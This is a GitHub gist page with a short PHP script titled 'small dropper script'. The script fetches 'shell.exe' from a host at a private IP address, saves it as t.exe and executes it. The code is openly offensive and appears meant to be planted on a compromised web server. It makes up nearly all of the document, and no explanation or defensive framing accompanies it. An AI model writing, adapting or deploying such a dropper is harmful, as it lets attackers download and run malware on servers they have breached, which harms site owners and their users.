Skip to content

Instantly share code, notes, and snippets.

@GitMirar
Created June 16, 2018 13:33
Show Gist options
  • Save GitMirar/f258352dd2ce8ea24091278001c0cc84 to your computer and use it in GitHub Desktop.
Save GitMirar/f258352dd2ce8ea24091278001c0cc84 to your computer and use it in GitHub Desktop.
small dropper script
<?php
$bd = "http://192.168.22.31/shell.exe";
$data = file_get_contents($bd);
file_put_contents("t.exe", $data);
exec("t.exe");
?>
Sign up for free to join this conversation on GitHub. Already have an account? Sign in to comment